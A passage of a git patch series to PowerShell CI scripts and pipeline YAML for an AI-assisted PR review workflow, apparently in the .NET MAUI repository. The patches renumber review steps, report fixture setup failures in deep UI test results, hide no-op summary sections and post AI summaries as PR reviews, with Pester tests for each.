"@ -Invoke-CopilotStep -StepName "STEP 6a: TRY-FIX" -Prompt $step6aPrompt | Out-Null +Invoke-CopilotStep -StepName "STEP 5a: TRY-FIX" -Prompt $step5aPrompt | Out-Null # Restore review branch between copilot calls git checkout $reviewBranch 2>$null | Out-Null -# Diagnostic: check what STEP 6a produced +# Diagnostic: check what STEP 5a produced Write-Host "" -Write-Host " 📊 STEP 6a output check:" -ForegroundColor Cyan +Write-Host " 📊 STEP 5a output check:" -ForegroundColor Cyan $tryFixDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" $tryFixContent = Join-Path $tryFixDir "try-fix/content.md" $preFlightContent = Join-Path $tryFixDir "pre-flight/content.md" @@ -1890,9 +1446,9 @@ if ($tryFixDirs) { Write-Host " ⚠️ No try-fix-N directories found" -ForegroundColor Yellow } -# ── STEP 6b: Expert Review of PR fix + final comparison (Copilot call 2) ── -$step6bPrompt = @" -Run expert code review of PR #$PRNumber's fix and compare against all try-fix candidates from STEP 6a. +# ── STEP 5b: Expert Review of PR fix + final comparison (Copilot call 2) ── +$step5bPrompt = @" +Run expert code review of PR #$PRNumber's fix and compare against all try-fix candidates from STEP 5a. Read context from: - ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/pre-flight/content.md`` @@ -1907,7 +1463,7 @@ Use the code-review skill with the maui-expert-reviewer agent to evaluate the PR Compare ALL candidates: - ``pr`` (the raw PR fix as submitted) - ``pr-plus-reviewer`` (PR fix + expert reviewer feedback applied) -- All ``try-fix-N`` candidates from STEP 6a +- All ``try-fix-N`` candidates from STEP 5a Pick the single winning candidate. **Candidates that failed regression tests MUST be ranked lower than candidates that passed them.** Write the comparative analysis to ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/report/content.md``. @@ -1934,11 +1490,11 @@ $autonomousRules Do NOT re-run gate verification. 
"@ -Invoke-CopilotStep -StepName "STEP 6b: EXPERT REVIEW + COMPARE" -Prompt $step6bPrompt | Out-Null +Invoke-CopilotStep -StepName "STEP 5b: EXPERT REVIEW + COMPARE" -Prompt $step5bPrompt | Out-Null -# Diagnostic: check what STEP 6b produced +# Diagnostic: check what STEP 5b produced Write-Host "" -Write-Host " 📊 STEP 6b output check:" -ForegroundColor Cyan +Write-Host " 📊 STEP 5b output check:" -ForegroundColor Cyan $expertEvalContent = Join-Path $tryFixDir "expert-pr-eval/content.md" $reportContent = Join-Path $tryFixDir "report/content.md" $winnerFile = Join-Path $tryFixDir "winner.json" @@ -1973,8 +1529,8 @@ git checkout $reviewBranch 2>$null | Out-Null # ─── Tier 3 refresh: feed AI categories back into category detection ─── # Step 2 ran detection without the AI tier (-AiCategories was empty). -# Pre-flight (Step 6) wrote `ai-categories.md`; re-run detection now so the -# unified comment reflects all three tiers before Step 7 posts. +# Pre-flight (Step 5) wrote `ai-categories.md`; re-run detection now so the +# unified comment reflects all three tiers before Step 6 posts. $aiCategoriesFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests/ai-categories.md" if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) { try { @@ -2006,19 +1562,6 @@ if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFi $uitestOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests" $uitestContentFile = Join-Path $uitestOutputDir "content.md" - # Preserve any STEP 3 results table that was appended earlier so - # the post-comment phase keeps the actual run output (categories + - # execution table) instead of just the refreshed category list. 
- $preservedExecution = "" - if (Test-Path $uitestContentFile) { - $existing = Get-Content $uitestContentFile -Raw - $marker = '### 🧪 UI Test Execution Results' - $idx = $existing.IndexOf($marker) - if ($idx -ge 0) { - $preservedExecution = $existing.Substring($idx) - } - } - if ($refreshedCategories -eq 'NONE') { "No UI test categories needed for this PR (no UI-relevant changes)." | Set-Content $uitestContentFile -Encoding UTF8 } elseif ([string]::IsNullOrWhiteSpace($refreshedCategories)) { @@ -2026,10 +1569,6 @@ if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFi } else { "**Detected UI test categories:** ``$refreshedCategories``" | Set-Content $uitestContentFile -Encoding UTF8 } - - if (-not [string]::IsNullOrWhiteSpace($preservedExecution)) { - Add-Content $uitestContentFile "`n$preservedExecution" -Encoding UTF8 - } } } catch { Write-Host " ⚠️ AI-tier category refresh failed (non-fatal, keeping Step 2 result): $_" -ForegroundColor Yellow @@ -2100,14 +1639,14 @@ if (-not $DryRun) { } # ═════════════════════════════════════════════════════════════════════════════ -# STEP 7: Post AI Summary Comment (direct script invocation) +# STEP 6: Post AI Summary Comment (direct script invocation) # When DEFER_COMMENT_TO_STAGE3=true, skip posting here — Stage 3 # (UpdateAISummaryComment) will post the full comment after deep tests. 
# ═════════════════════════════════════════════════════════════════════════════ Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Magenta -Write-Host "║ STEP 7: POST AI SUMMARY ║" -ForegroundColor Magenta +Write-Host "║ STEP 6: POST AI SUMMARY ║" -ForegroundColor Magenta Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Magenta $summaryScriptsDir = $ScriptsDir @@ -2138,7 +1677,7 @@ if (Test-Path $reviewScript) { # Persist comment ID + PR number to a known location and emit # as an output variable so the downstream UpdateAISummaryComment - # stage in ci-copilot.yml can rewrite the STEP 3 section once + # stage in ci-copilot.yml can rewrite the UI tests section once # the deep UI tests finish on the platform-pool agents. $commentIdFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/ai-summary-comment-id.txt" New-Item -ItemType Directory -Force -Path (Split-Path -Parent $commentIdFile) | Out-Null @@ -2303,12 +1842,12 @@ $( if ($truncated) { "`n_The diff was truncated to fit GitHub's review body limi } # ═════════════════════════════════════════════════════════════════════════════ -# STEP 8: Apply Labels +# STEP 7: Apply Labels # ═════════════════════════════════════════════════════════════════════════════ Write-Host "" Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Blue -Write-Host "║ STEP 8: APPLY LABELS ║" -ForegroundColor Blue +Write-Host "║ STEP 7: APPLY LABELS ║" -ForegroundColor Blue Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Blue $labelHelperPath = Join-Path $ScriptsDir "shared/Update-AgentLabels.ps1" From d4deda6983c9b8523a08f4fc25abfc182abfa6c5 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Thu, 28 May 2026 16:10:35 +0200 Subject: [PATCH 16/34] Fix deep UI setup failure reporting Detect category-wide fixture 
setup failures in deep UI TRX aggregation and render them as setup failures instead of duplicated failed tests. Keep the deep UI task successful so the summary comment stage can publish the artifact-backed result. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../Aggregate-UITestArtifacts.Tests.ps1 | 31 +++++++- .../shared/Aggregate-UITestArtifacts.ps1 | 54 +++++++++++-- .../shared/Get-AggregatedTrxFromDirectory.ps1 | 54 +++++++++++-- eng/pipelines/ci-copilot.yml | 76 ++++++++++++++++++- 4 files changed, 197 insertions(+), 18 deletions(-) diff --git a/.github/scripts/shared/Aggregate-UITestArtifacts.Tests.ps1 b/.github/scripts/shared/Aggregate-UITestArtifacts.Tests.ps1 index 077556a88a95..0b131f65ba2c 100644 --- a/.github/scripts/shared/Aggregate-UITestArtifacts.Tests.ps1 +++ b/.github/scripts/shared/Aggregate-UITestArtifacts.Tests.ps1 @@ -27,14 +27,19 @@ BeforeAll { [int]$Failed, [int]$Skipped = 0, [string[]]$PassedTests = @(), - [string[]]$FailedTests = @() + [string[]]$FailedTests = @(), + [string]$FailedMessage = 'boom', + [string]$FailedStack = '' ) $executed = $Total - $Skipped + $failedMessageXml = [System.Security.SecurityElement]::Escape($FailedMessage) + $failedStackXml = [System.Security.SecurityElement]::Escape($FailedStack) + $stackXml = if ([string]::IsNullOrEmpty($FailedStack)) { '' } else { "$failedStackXml" } $passedXml = ($PassedTests | ForEach-Object { " " }) -join "`n" $failedXml = ($FailedTests | ForEach-Object { - " boom" + " $failedMessageXml$stackXml" }) -join "`n" @" @@ -128,6 +133,7 @@ Describe 'Get-AggregatedTrxFromDirectory (TRX walk + merge)' { $r[$cvKey].Total | Should -Be 619 $r[$cvKey].Passed | Should -Be 75 $r[$cvKey].Failed | Should -Be 544 + $r[$cvKey].SetupFailure | Should -Be $false $edKey = $r.Keys | Where-Object { $_ -match 'Editor' } | Select-Object -First 1 $edKey | Should -Not -BeNullOrEmpty @@ -136,6 +142,27 @@ Describe 'Get-AggregatedTrxFromDirectory (TRX walk + merge)' { $r[$edKey].Failed | 
Should -Be 68 } + It 'marks category-wide fixture setup failures without changing TRX counters' { + $setupRoot = Join-Path $script:fixtureRoot 'setup-failure-test' + New-Item -ItemType Directory -Path $setupRoot -Force | Out-Null + $catDir = Join-Path $setupRoot 'drop-android_ui_tests-controls-WebView' + New-Item -ItemType Directory -Path $catDir -Force | Out-Null + New-TrxFixture -Path (Join-Path $catDir 'webview.trx') ` + -Total 2 -Passed 0 -Failed 2 ` + -FailedTests @('WebViewTest1','WebViewTest2') ` + -FailedMessage 'OneTimeSetUp: System.TimeoutException : Timed out waiting for Go To Test button to appear' ` + -FailedStack 'at Microsoft.Maui.TestUtils.DeviceTests.Runners.UITestBase.OneTimeSetup()' + + $r = Get-AggregatedTrxFromDirectory -RootDir $setupRoot + $key = @($r.Keys)[0] + + $r[$key].Total | Should -Be 2 + $r[$key].Failed | Should -Be 2 + $r[$key].SetupFailure | Should -Be $true + $r[$key].SetupFailureCount | Should -Be 2 + $r[$key].SetupFailureMessage | Should -Match 'Go To Test button' + } + It 'sums multiple TRX files for the same category' { $double = Join-Path $script:fixtureRoot 'double-test' New-Item -ItemType Directory -Path $double -Force | Out-Null diff --git a/.github/scripts/shared/Aggregate-UITestArtifacts.ps1 b/.github/scripts/shared/Aggregate-UITestArtifacts.ps1 index 306a5ff548bb..25e188e927a3 100644 --- a/.github/scripts/shared/Aggregate-UITestArtifacts.ps1 +++ b/.github/scripts/shared/Aggregate-UITestArtifacts.ps1 @@ -120,13 +120,18 @@ function Get-AggregatedTrxFromDirectory { if (-not $byCategory.ContainsKey($category)) { $byCategory[$category] = @{ - Total = 0 - Passed = 0 - Failed = 0 - Skipped = 0 - Results = @() - TrxPaths = @() - ArtifactName = $artName + Total = 0 + Passed = 0 + Failed = 0 + Skipped = 0 + Results = @() + TrxPaths = @() + ArtifactName = $artName + SetupFailure = $false + SetupFailureCount = 0 + SetupFailureMessage = '' + SetupFailureStack = '' + SetupFailureSignatureCount = 0 } } $cur = $byCategory[$category] @@ 
-139,6 +144,41 @@ function Get-AggregatedTrxFromDirectory { $byCategory[$category] = $cur } + foreach ($category in @($byCategory.Keys)) { + $cur = $byCategory[$category] + $failedResults = @($cur.Results | Where-Object { $_.status -eq 'Failed' }) + if ($failedResults.Count -eq 0) { + continue + } + + $setupFailures = @($failedResults | Where-Object { + $errorText = [string]($_.error) + $stackText = [string]($_.stack) + $errorText -match '^\s*OneTimeSetUp:' -or + $errorText -match 'Timed out waiting for Go To Test button to appear' -or + $stackText -match '(_GalleryUITest\.FixtureSetup|\bFixtureSetup\b|UITestBase\.(OneTimeSetup|TestSetup))' + }) + + if ($setupFailures.Count -ne $failedResults.Count) { + continue + } + + $signatures = @{} + foreach ($failure in $setupFailures) { + $errorText = ([string]($failure.error) -replace '\s+', ' ').Trim() + $stackText = ([string]($failure.stack) -replace '\s+', ' ').Trim() + $signatures["$errorText|$stackText"] = $true + } + + $sample = $setupFailures | Select-Object -First 1 + $cur.SetupFailure = $true + $cur.SetupFailureCount = $setupFailures.Count + $cur.SetupFailureMessage = ([string]($sample.error)).Trim() + $cur.SetupFailureStack = ([string]($sample.stack)).Trim() + $cur.SetupFailureSignatureCount = $signatures.Count + $byCategory[$category] = $cur + } + return $byCategory } diff --git a/.github/scripts/shared/Get-AggregatedTrxFromDirectory.ps1 b/.github/scripts/shared/Get-AggregatedTrxFromDirectory.ps1 index bba2c0e8dd02..4652213ad1f5 100644 --- a/.github/scripts/shared/Get-AggregatedTrxFromDirectory.ps1 +++ b/.github/scripts/shared/Get-AggregatedTrxFromDirectory.ps1 @@ -18,13 +18,18 @@ function Get-AggregatedTrxFromDirectory { if (-not $byCategory.ContainsKey($category)) { $byCategory[$category] = @{ - Total = 0 - Passed = 0 - Failed = 0 - Skipped = 0 - Results = @() - TrxPaths = @() - ArtifactName = $artName + Total = 0 + Passed = 0 + Failed = 0 + Skipped = 0 + Results = @() + TrxPaths = @() + ArtifactName = 
$artName + SetupFailure = $false + SetupFailureCount = 0 + SetupFailureMessage = '' + SetupFailureStack = '' + SetupFailureSignatureCount = 0 } } $cur = $byCategory[$category] @@ -37,5 +42,40 @@ function Get-AggregatedTrxFromDirectory { $byCategory[$category] = $cur } + foreach ($category in @($byCategory.Keys)) { + $cur = $byCategory[$category] + $failedResults = @($cur.Results | Where-Object { $_.status -eq 'Failed' }) + if ($failedResults.Count -eq 0) { + continue + } + + $setupFailures = @($failedResults | Where-Object { + $errorText = [string]($_.error) + $stackText = [string]($_.stack) + $errorText -match '^\s*OneTimeSetUp:' -or + $errorText -match 'Timed out waiting for Go To Test button to appear' -or + $stackText -match '(_GalleryUITest\.FixtureSetup|\bFixtureSetup\b|UITestBase\.(OneTimeSetup|TestSetup))' + }) + + if ($setupFailures.Count -ne $failedResults.Count) { + continue + } + + $signatures = @{} + foreach ($failure in $setupFailures) { + $errorText = ([string]($failure.error) -replace '\s+', ' ').Trim() + $stackText = ([string]($failure.stack) -replace '\s+', ' ').Trim() + $signatures["$errorText|$stackText"] = $true + } + + $sample = $setupFailures | Select-Object -First 1 + $cur.SetupFailure = $true + $cur.SetupFailureCount = $setupFailures.Count + $cur.SetupFailureMessage = ([string]($sample.error)).Trim() + $cur.SetupFailureStack = ([string]($sample.stack)).Trim() + $cur.SetupFailureSignatureCount = $signatures.Count + $byCategory[$category] = $cur + } + return $byCategory } diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 8a571ef15eb2..ebce013b91ea 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -1278,6 +1278,7 @@ stages: # from running. 
Write-Host "##vso[task.logissue type=warning]One or more deep UI test categories failed (see TRX in drop-deep-uitests artifact)" } + exit 0 displayName: 'Run deep UI tests (per-category loop)' timeoutInMinutes: 220 @@ -1412,6 +1413,7 @@ stages: # Render the new STEP 3 section. $totalPassed = 0; $totalFailed = 0 + $setupFailureCategories = 0; $setupImpactedTests = 0; $emptyCategories = 0 $sb = [System.Text.StringBuilder]::new() [void]$sb.AppendLine() [void]$sb.AppendLine("### 🧪 UI Test Execution Results (deep, platform pool)") @@ -1419,6 +1421,7 @@ stages: [void]$sb.AppendLine("| Category | Tests | Snapshot diffs |") [void]$sb.AppendLine("|---|---|---|") $perCategoryFailures = [ordered]@{} + $perCategorySetupFailures = [ordered]@{} foreach ($k in ($byCat.Keys | Sort-Object)) { $b = $byCat[$k] $totalPassed += [int]$b.Passed @@ -1426,7 +1429,16 @@ stages: $tCount = [int]$b.Total $tPass = [int]$b.Passed $tFail = [int]$b.Failed - $col = if ($tCount -eq 0) { '—' } + $isSetupFailure = ($b.ContainsKey('SetupFailure') -and [bool]$b.SetupFailure) + if ($isSetupFailure) { + $setupFailureCategories++ + $setupImpactedTests += [int]$b.SetupFailureCount + } + if ($tCount -eq 0) { + $emptyCategories++ + } + $col = if ($tCount -eq 0) { '0 tests' } + elseif ($isSetupFailure) { "$tPass/$tCount (setup failed; $tFail marked failed)" } elseif ($tFail -gt 0) { "$tPass/$tCount ($tFail ❌)" } else { "$tPass/$tCount ✓" } # Count snapshot-diff PNGs we shipped in this artifact subdir @@ -1441,6 +1453,15 @@ stages: # Capture failed test entries from the parsed TRX so we can # render a per-category disclosure section listing the actual # failing test names + the first line of their error message. 
+ if ($isSetupFailure) { + $perCategorySetupFailures[$k] = [pscustomobject]@{ + Count = [int]$b.SetupFailureCount + Message = $b.SetupFailureMessage -as [string] + Stack = $b.SetupFailureStack -as [string] + SignatureCount = [int]$b.SetupFailureSignatureCount + } + continue + } $catFailed = @() foreach ($r in @($b.Results)) { if ($r.status -eq 'Failed') { @@ -1456,6 +1477,41 @@ stages: } } + # Fixture setup failures usually mark every test in the fixture as + # failed even though no individual test body ran. Render one + # representative setup error instead of dozens of duplicate tests. + if ($perCategorySetupFailures.Count -gt 0) { + [void]$sb.AppendLine() + foreach ($cat in $perCategorySetupFailures.Keys) { + $info = $perCategorySetupFailures[$cat] + $setupCount = [int]$info.Count + $setupTestText = if ($setupCount -eq 1) { '1 test' } else { "$setupCount tests" } + [void]$sb.AppendLine("
⚠️ $cat — fixture setup failed for $setupTestText") + [void]$sb.AppendLine("
") + [void]$sb.AppendLine() + [void]$sb.AppendLine("NUnit reported a `OneTimeSetUp`/fixture setup failure before test bodies ran; the TRX marked each affected test failed.") + if ([int]$info.SignatureCount -gt 1) { + [void]$sb.AppendLine() + [void]$sb.AppendLine("_Multiple setup failure signatures were present; showing the first one. See the TRX artifact for all details._") + } + $errText = if (-not [string]::IsNullOrWhiteSpace($info.Message)) { $info.Message.Trim() } else { '' } + $stackText = if (-not [string]::IsNullOrWhiteSpace($info.Stack)) { $info.Stack.Trim() } else { '' } + $combined = $errText + if ($stackText) { $combined = $combined + [Environment]::NewLine + $stackText } + if ($combined.Length -gt 1500) { $combined = $combined.Substring(0, 1500) + [Environment]::NewLine + '...' } + if ($combined) { + [void]$sb.AppendLine() + $fence = [string]::new([char]96, 3) + [void]$sb.AppendLine($fence) + [void]$sb.AppendLine($combined) + [void]$sb.AppendLine($fence) + } + [void]$sb.AppendLine() + [void]$sb.AppendLine("
") + [void]$sb.AppendLine() + } + } + # Per-category failed-test disclosure sections (collapsed by # default to keep the comment compact). if ($perCategoryFailures.Count -gt 0) { @@ -1503,7 +1559,23 @@ stages: [void]$sb.AppendLine() $resultIcon = if ($totalFailed -gt 0) { '❌' } elseif ($totalPassed -gt 0) { '✅' } else { '⏭️' } - $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed, $totalFailed failed across $($byCat.Count) categor$(if ($byCat.Count -eq 1) {'y'} else {'ies'}) on platform-pool agent (replaces in-process counts above)." + $categoryText = if ($byCat.Count -eq 1) { '1 category' } else { "$($byCat.Count) categories" } + $regularFailed = [Math]::Max(0, $totalFailed - $setupImpactedTests) + if ($setupFailureCategories -gt 0) { + $setupCategoryText = if ($setupFailureCategories -eq 1) { '1 category setup failure' } else { "$setupFailureCategories category setup failures" } + $setupImpactedText = if ($setupImpactedTests -eq 1) { '1 impacted test' } else { "$setupImpactedTests impacted tests" } + if ($regularFailed -eq 0) { + $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed; $setupCategoryText ($setupImpactedText marked failed by TRX) across $categoryText on platform-pool agent (replaces in-process counts above)." + } else { + $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed, $regularFailed failed, plus $setupCategoryText ($setupImpactedText marked failed by TRX) across $categoryText on platform-pool agent (replaces in-process counts above)." + } + } else { + $headerLine = "$resultIcon **Deep UI tests** — $totalPassed passed, $totalFailed failed across $categoryText on platform-pool agent (replaces in-process counts above)." + } + if ($emptyCategories -gt 0) { + $emptyText = if ($emptyCategories -eq 1) { '1 category reported 0 tests.' } else { "$emptyCategories categories reported 0 tests." 
} + $headerLine = "$headerLine $emptyText" + } $beginMarker = '' $endMarker = '' From bbd60558bfd150d638276631f93b3546ab2f7387 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Thu, 28 May 2026 17:36:24 +0200 Subject: [PATCH 17/34] Hide no-op AI summary sections Skip rendering UI test and regression cross-reference sections when their content only reports no actionable work. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../scripts/Post-AISummaryComment.Tests.ps1 | 75 +++++++++++++++++++ .github/scripts/post-ai-summary-comment.ps1 | 33 ++++++++ 2 files changed, 108 insertions(+) create mode 100644 .github/scripts/Post-AISummaryComment.Tests.ps1 diff --git a/.github/scripts/Post-AISummaryComment.Tests.ps1 b/.github/scripts/Post-AISummaryComment.Tests.ps1 new file mode 100644 index 000000000000..81ebc4331f54 --- /dev/null +++ b/.github/scripts/Post-AISummaryComment.Tests.ps1 @@ -0,0 +1,75 @@ +#!/usr/bin/env pwsh +#Requires -Modules Pester +<# +.SYNOPSIS + Pester tests for pure-function helpers in post-ai-summary-comment.ps1. 
+ +.EXAMPLE + Invoke-Pester ./Post-AISummaryComment.Tests.ps1 +#> + +BeforeAll { + $scriptPath = Join-Path $PSScriptRoot 'post-ai-summary-comment.ps1' + $tokens = $null + $parseErrors = $null + $ast = [System.Management.Automation.Language.Parser]::ParseFile($scriptPath, [ref]$tokens, [ref]$parseErrors) + if ($parseErrors -and $parseErrors.Count -gt 0) { + throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine + } + + $function = $ast.Find({ + $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and + $args[0].Name -eq 'Test-PhaseContentIsNoOp' + }, $true) + + if (-not $function) { + throw "Function 'Test-PhaseContentIsNoOp' not found" + } + + Invoke-Expression $function.Extent.Text +} + +Describe 'Test-PhaseContentIsNoOp' { + It 'suppresses the no-UI-tests placeholder' { + Test-PhaseContentIsNoOp ` + -PhaseKey 'uitests' ` + -Content 'No UI test categories needed for this PR (no UI-relevant changes).' | + Should -BeTrue + } + + It 'keeps UI test content when categories or full matrix are present' { + Test-PhaseContentIsNoOp ` + -PhaseKey 'uitests' ` + -Content '**Detected UI test categories:** `Button,Entry`' | + Should -BeFalse + + Test-PhaseContentIsNoOp ` + -PhaseKey 'uitests' ` + -Content 'Full UI test matrix will run (no specific categories detected from PR changes).' | + Should -BeFalse + } + + It 'suppresses regression placeholders when there are no implementation files or risks' { + Test-PhaseContentIsNoOp ` + -PhaseKey 'regression-check' ` + -Content '🟢 No implementation files modified — skipping regression cross-reference.' | + Should -BeTrue + + Test-PhaseContentIsNoOp ` + -PhaseKey 'regression-check' ` + -Content "## 🔍 Regression Cross-Reference`n`n🟢 No regression risks detected. No labeled bug-fix PRs in the last 6 months touched the modified files." 
| + Should -BeTrue + } + + It 'keeps actionable regression content' { + Test-PhaseContentIsNoOp ` + -PhaseKey 'regression-check' ` + -Content "## 🔍 Regression Cross-Reference`n`n🟡 **Overlaps with prior bug-fix PRs** — same files modified, but no exact line revert detected." | + Should -BeFalse + + Test-PhaseContentIsNoOp ` + -PhaseKey 'regression-check' ` + -Content '⚠️ Regression cross-reference failed: gh api failed' | + Should -BeFalse + } +} diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 5648709851a6..9f9f691de062 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -79,6 +79,34 @@ $phases = [ordered]@{ "report" = @{ File = "report/content.md"; Icon = "📋"; Title = "Report — Final Recommendation" } } +function Test-PhaseContentIsNoOp { + param( + [Parameter(Mandatory = $true)] + [string]$PhaseKey, + + [Parameter(Mandatory = $true)] + [string]$Content + ) + + $normalized = ($Content -replace "`r`n", "`n").Trim() + + switch ($PhaseKey) { + "uitests" { + return $normalized -match '^No UI test categories needed for this PR \(no UI-relevant changes\)\.?$' + } + "regression-check" { + $withoutHeading = ($normalized -replace '(?m)^##\s+.*Regression Cross-Reference\s*\n+', '').Trim() + return ( + $withoutHeading -match '^🟢\s+No implementation files modified\s+[—-]\s+skipping regression cross-reference\.\s*$' -or + $withoutHeading -match '^🟢\s+No regression risks detected\.\s+No labeled bug-fix PRs in the last \d+ months touched the modified files\.\s*$' + ) + } + default { + return $false + } + } +} + # ─── Gate content (rendered first, always open) ─── $gateSection = $null $gateFilePath = Join-Path $PRAgentDir "gate/content.md" @@ -111,6 +139,11 @@ foreach ($key in $phases.Keys) { if (Test-Path $filePath) { $content = Get-Content $filePath -Raw -Encoding UTF8 if (-not [string]::IsNullOrWhiteSpace($content)) { + if (Test-PhaseContentIsNoOp -PhaseKey 
$key -Content $content) { + Write-Host " ⏭️ $key (no actionable content)" -ForegroundColor Gray + continue + } + Write-Host " ✅ $key ($((Get-Item $filePath).Length) bytes)" -ForegroundColor Green # For uitests, make title dynamic: "UI Tests — Cat1, Cat2" $phaseTitle = "$($phase.Icon) $($phase.Title)" From d3069ceb8e072338e22d446f29f5e1821940f83d Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 13:46:06 +0200 Subject: [PATCH 18/34] Enhance MauiBot review posting Post AI summaries as PR reviews with parsed verdicts, hide stale MauiBot artifacts instead of deleting them, and preserve same-run try-fix reviews. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Find-RegressionRisks.ps1 | 4 +- .../scripts/Post-AISummaryComment.Tests.ps1 | 35 ++- .../Remove-StaleMauiBotComments.Tests.ps1 | 58 ++++ .github/scripts/Review-PR.Tests.ps1 | 2 +- .github/scripts/Review-PR.ps1 | 58 ++-- .github/scripts/post-ai-summary-comment.ps1 | 188 +++++++++--- .../shared/Remove-StaleMauiBotComments.ps1 | 281 +++++++++++++++--- .github/skills/code-review/SKILL.md | 4 +- .github/skills/find-regression-risk/SKILL.md | 2 +- eng/pipelines/ci-copilot.yml | 68 ++--- 10 files changed, 554 insertions(+), 146 deletions(-) create mode 100644 .github/scripts/Remove-StaleMauiBotComments.Tests.ps1 diff --git a/.github/scripts/Find-RegressionRisks.ps1 b/.github/scripts/Find-RegressionRisks.ps1 index eae088686e68..efa5da467bac 100644 --- a/.github/scripts/Find-RegressionRisks.ps1 +++ b/.github/scripts/Find-RegressionRisks.ps1 @@ -14,7 +14,7 @@ added → 🔴 REVERT. Same file but no line match → 🟡 OVERLAP. Otherwise → 🟢 CLEAN. Outputs (when -OutputDir is provided): - - content.md Markdown summary suitable for the wall-of-text PR comment. + - content.md Markdown summary suitable for the wall-of-text PR review. - risks.json Structured findings for downstream agents. 
- result.txt One token: CLEAN | OVERLAP | REVERT (used by Review-PR.ps1 for branching). @@ -726,7 +726,7 @@ if ($OutputDir) { } | ConvertTo-Json -Depth 6 $payload | Set-Content (Join-Path $OutputDir 'risks.json') -Encoding UTF8 - # content.md — markdown summary for the wall-of-text PR comment + # content.md — markdown summary for the wall-of-text PR review $md = New-Object System.Text.StringBuilder [void]$md.AppendLine("## 🔍 Regression Cross-Reference") [void]$md.AppendLine() diff --git a/.github/scripts/Post-AISummaryComment.Tests.ps1 b/.github/scripts/Post-AISummaryComment.Tests.ps1 index 81ebc4331f54..b02a84fda302 100644 --- a/.github/scripts/Post-AISummaryComment.Tests.ps1 +++ b/.github/scripts/Post-AISummaryComment.Tests.ps1 @@ -17,16 +17,18 @@ BeforeAll { throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine } - $function = $ast.Find({ - $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and - $args[0].Name -eq 'Test-PhaseContentIsNoOp' - }, $true) + foreach ($functionName in @('Test-PhaseContentIsNoOp', 'Get-AIReviewEvent')) { + $function = $ast.Find({ + $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and + $args[0].Name -eq $functionName + }, $true) - if (-not $function) { - throw "Function 'Test-PhaseContentIsNoOp' not found" - } + if (-not $function) { + throw "Function '$functionName' not found" + } - Invoke-Expression $function.Extent.Text + Invoke-Expression $function.Extent.Text + } } Describe 'Test-PhaseContentIsNoOp' { @@ -73,3 +75,20 @@ Describe 'Test-PhaseContentIsNoOp' { Should -BeFalse } } + +Describe 'Get-AIReviewEvent' { + It 'maps an exact approve recommendation to APPROVE' { + Get-AIReviewEvent -ReportContent "## ✅ Final Recommendation: APPROVE`n`nLooks good." 
| + Should -Be 'APPROVE' + } + + It 'maps an exact request-changes recommendation to REQUEST_CHANGES' { + Get-AIReviewEvent -ReportContent "## ⚠️ Final Recommendation: REQUEST CHANGES`n`nNeeds the try-fix candidate." | + Should -Be 'REQUEST_CHANGES' + } + + It 'falls back to COMMENT when the recommendation is missing or ambiguous' { + Get-AIReviewEvent -ReportContent '' | Should -Be 'COMMENT' + Get-AIReviewEvent -ReportContent 'Recommendation: APPROVE after manual review' | Should -Be 'COMMENT' + } +} diff --git a/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 b/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 new file mode 100644 index 000000000000..21c43a0813ed --- /dev/null +++ b/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 @@ -0,0 +1,58 @@ +#!/usr/bin/env pwsh +#Requires -Modules Pester +<# +.SYNOPSIS + Pester tests for stale MauiBot artifact helper pure functions. +#> + +BeforeAll { + $scriptPath = Join-Path $PSScriptRoot 'shared/Remove-StaleMauiBotComments.ps1' + $tokens = $null + $parseErrors = $null + $ast = [System.Management.Automation.Language.Parser]::ParseFile($scriptPath, [ref]$tokens, [ref]$parseErrors) + if ($parseErrors -and $parseErrors.Count -gt 0) { + throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine + } + + . 
